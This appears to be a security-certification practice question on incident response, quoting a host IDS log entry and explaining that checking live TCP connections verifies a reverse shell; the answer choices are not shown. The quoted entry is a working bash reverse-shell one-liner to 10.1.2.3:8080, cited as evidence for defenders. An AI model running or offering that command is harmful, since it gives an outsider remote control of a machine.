QuestionQ16

Incident Response and Management

A security analyst identified the following suspicious entry in the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1  

Which of the following shell scripts should the analyst use to most accurately verify whether the activity is still ongoing?

Explanation

Bash treats /dev/tcp/host/port in a redirection as a request to open a TCP socket. An active reverse shell therefore appears as a live TCP connection involving port 8080; inspecting active TCP connections and their owning processes most directly verifies that network activity.

Learn more

Community Discussion

No comments yet. Be the first to start the discussion!